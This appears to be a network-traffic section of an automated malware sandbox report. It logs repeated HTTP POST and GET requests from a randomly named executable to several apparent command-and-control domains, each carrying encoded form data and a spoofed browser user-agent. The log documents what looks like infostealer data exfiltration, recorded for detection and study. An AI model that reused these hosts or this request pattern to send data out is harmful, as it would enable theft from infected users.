                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfrdddwolne2+rtNgFw1ur3drwQ4x4m0ihgKELnxjI6K/N36A+L2oiE2NLSQpiLr8zA4KeeVqDpEXGLxoBB1L8ndHv8p/0r8waVazazIR0cnsubWUcO5mEHDpF7sHbDzNxOyW5fMyE1clQ11OEQgPTmQVSYwWKWCXdsw4kP7bdl11/FzznWu
Dec 11, 2024 09:40:11.728720903 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49944 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:13.312793970 CET | 1760 | OUT | POST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfjdcuookBW2/rtN8Vw0ur3ArwY8x4qKik8KCt7xh56KxN36C+Lz2SEvNLDZpi7r8zA4KdGVkHdEamLyhhB5aMnmHv05/0uJxr1az+fITmEnzebURcOxmEDcpF3KHbfZN26yT4uhpnJomCZjNkYEeW+nbV0xfrqUI9hT1gPpR5oMte8h2RqghA/oVgyqS7UIHfMJhzmVwki1/Z+nEfZ0s4JdiGSFrK2FrNV96lwSUkgh2XvPH+Zcg9jM1TqF5lExgjq5gMf/X6gZTxwl5ONBe7NV3hvzc08VpbnH33ZnwmWydRcaInr34K9KU1n9aL6n+DXUbxYKBJ3ROnG9zPFDrR97tompsmFl2Pv0cICYILC6a+EvmSwhxHgKz1oNbpIhWM1ljK6AcUR/Fu4B8ay1BNwkQHQ9pdBfoboVD5Dwgv4WaTZD3RnV25HBmxC+ECzP6CjJnnxFyMld/xqp7aY343WawtyQ8SNNFSXZegIFxz4F1cGv+jfXxSDPsmg4ZUbHh1INPKkPBpBwepIAvmFNtP648+jfTxNmBd4byZqAp0S7AcKEIoBTVQc0jvy2cTGoroecdFbbc7ds7R0Haq2cjrvxDxpavRbZ2K4mbjcMMCyKNTgVhnHGexPRhftB/A9C1c8b6qq036e8y40qTy3u+o1SjH/bcI4vuwVs0TwYSjFp50869bQy5kPMWJ5qSgZgQu1Niyd/AR9VEfpRVBR3OJLGDNYPCQtN65mRs7Q6Gvl4/TMeOBhkJFR4v6t9QfQtzxqXMtJa8wFcNGpASLhjdg6uGTN58TGzuT0JFTY3oxCdQZbGUYV1Ns8G48lV5RqVOK+Pl/bAGulR+wb4maT6Hii+krcC8BBnux+yBirFaDQAQ5BdSIkC7DfeG2MezrtRmf0X0rshT97LXMEPlDI/KOrTR1BiqeW30kRfMClCpI2E23vnz/tzJGN3+snm71KDRPk [TRUNCATED]
Dec 11, 2024 09:40:14.395376921 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49953 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:15.951203108 CET | 553 | OUT | GET /08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:17.046646118 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:40:16 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49989 | 5.39.10.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:31.085997105 CET | 810 | OUT | POST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:32.321997881 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:32 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49995 | 5.39.10.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:33.741982937 CET | 830 | OUT | POST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:34.968708992 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:34 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 50001 | 5.39.10.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:36.396080017 CET | 1751 | OUT | POST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:37.656652927 CET | 354 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 50007 | 5.39.10.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:39.061841965 CET | 550 | OUT | GET /v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:40.345693111 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:40 GMT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 50029 | 194.58.112.174 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:46.592794895 CET | 792 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:47.905786037 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:47 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 50035 | 194.58.112.174 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:49.256979942 CET | 812 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:50.569122076 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:50 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 50041 | 194.58.112.174 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:51.905644894 CET | 1733 | OUT | POST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:53.220352888 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:52 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 50047 | 194.58.112.174 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:54.553649902 CET | 544 | OUT | GET /6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ== HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:40:55.871958017 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:55 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: 2652<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.synd.fun</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 50069 | 209.74.64.187 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:01.580017090 CET | 804 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=onR9AvgxrVBHW1CBoThJet9LRKo7HvCK7LTc/8vMMRqIz4hL9+9avVIEsgBlul+o9nY5KjJfkIilw8t9SIo+BKoW10MhAjNjZG5tCg4qzeRmsl7qEVqqeqzQyf6PvjWw/XNZm0vWnV8w/UD7sycImcJwBRrb4absiBPn0cSJ4EUjssc7IMCxtN0TEetr7S+rEAToSug=
Dec 11, 2024 09:41:02.787748098 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:02 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 50075 | 209.74.64.187 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:04.332432985 CET | 824 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiOIzZxLvqRa/FIE4QBsgF+v9ncHKmxfkImlw9d9Sbw9DaoY0EMjdzNjZG5tCgcQza1mrULqEwKpdqzXmP6PrjX5/XN/m1zwnTww/Vz7sg0LscJyPxqt+q2EkQ3Y/M/bkmtdtatRSuKZ+tYrUNlcqifCejDYM53rmKqzQaX02EYD2k7JsDn3
Dec 11, 2024 09:41:05.540657043 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:05 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 50081 | 209.74.64.187 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:07.254709959 CET | 1745 | OUT | POST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Data Ascii: x6lPJLCP= [TRUNCATED]
Dec 11, 2024 09:41:08.513253927 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:08 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50087 | 209.74.64.187 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:09.919754028 CET | 548 | OUT | GET /ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:41:11.128878117 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:10 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 50103 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:41:17.003994942 CET | 813 | OUT | POST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
